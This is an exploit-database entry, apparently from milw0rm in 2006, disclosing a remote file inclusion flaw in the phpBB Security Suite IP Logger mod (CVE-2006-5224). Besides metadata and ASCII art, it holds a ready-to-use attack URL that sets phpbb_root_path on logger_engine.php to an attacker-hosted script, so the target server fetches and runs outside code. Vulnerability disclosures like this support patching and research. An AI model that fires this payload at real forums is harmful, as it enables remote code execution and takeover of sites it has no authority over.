phpBB Security Suite Mod 1.0.0 - 'logger_engine.php' Remote File Inclusion
Author: SpiderZ
type: webapps
platform: php
port:
date_added: 2006-10-04
date_updated:
verified: 1
codes: OSVDB-29550;CVE-2006-5224
tags:
aliases:
screenshot_url:
application_url:
/ \
\ \ ,, / /
'-.`\()/`.-'
.--_'( )'_--.
/ /` /`""`\ `\ \ * SpiderZ Hacking Security *
| | >< | |
\ \ / /
'.__.'
# Author: SpiderZ
# Security Suite IP Logger Remote File Inclusion Vulnerability
# For: phpBB ( 2.0.x - 2.0.21 )
# Site: www.spiderz.altervista.org
# Site02: www.spiderz.netsons.org
_________________________________________________________________________
# Remote File Inclusion - Security Suite IP Logger
http://site.com/[path]/includes/logger_engine.php?phpbb_root_path=http://[Evil_script]
-------------------------------------------------------------------------
# Download: http://www.phpbb.de/viewtopic.php?t=30261
# Download2: http://prdownload.berlios.de/dwingmods/logger_mod100.zip
-------------------------------------------------------------------------
# milw0rm.com [2006-10-05]